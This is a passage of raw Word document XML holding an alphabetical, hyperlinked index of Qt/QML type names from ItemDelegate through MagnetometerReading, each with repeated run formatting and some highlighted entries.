                <w:t>ItemDelegate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09" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ItemGrabResult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10" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ItemModelBarDataProxy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11" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ItemModelScatterDataProxy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12" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ItemModelSurfaceDataProxy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13" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ItemParticle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14" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ItemSelectionModel</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71" w:name="j"/>
            <w:bookmarkEnd w:id="1171"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>J</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15" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>JavaScriptDialogRequest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16" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>JumpList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17" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>JumpListCategory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18" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>JumpListDestination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19" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>JumpListLink</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20" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>JumpListSeparator</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>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bookmarkStart w:id="1172" w:name="k"/>
            <w:bookmarkEnd w:id="1172"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>K</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21" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Key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22" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyboardColumn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23" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyboardDevice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24" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyboardHandler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25" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyboardLayout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26" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyboardLayoutLoader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27" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyboardRow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28" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyboardStyle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29" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyEvent: QtQuick</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30" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyEvent: Qt3D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31" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyIcon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32" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyNavigation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33" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>KeyPanel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34" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Keys</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73" w:name="l"/>
            <w:bookmarkEnd w:id="1173"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>L</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035" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Label: QtQuickControls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36" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Label: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37" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layer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38" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LayerFilter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39" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout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40" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LayoutMirroring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41" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Legend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42" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LevelAdjust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43" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Light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44" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Light3D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45" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LightReading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46" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LightSensor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47" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LinearGradient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48" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LineSeries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49" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LineShape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50" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>list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51" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ListElement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52" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ListModel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53" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ListView</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54" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Loader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55" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Locale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56" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Location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57" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LoggingCategory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58" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LogicalDevice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59" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LogValueAxis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060" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>LogValueAxis3DFormatter</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>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bookmarkStart w:id="1174" w:name="m"/>
            <w:bookmarkEnd w:id="1174"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</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61" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Magnetometer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62" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MagnetometerReading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63" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
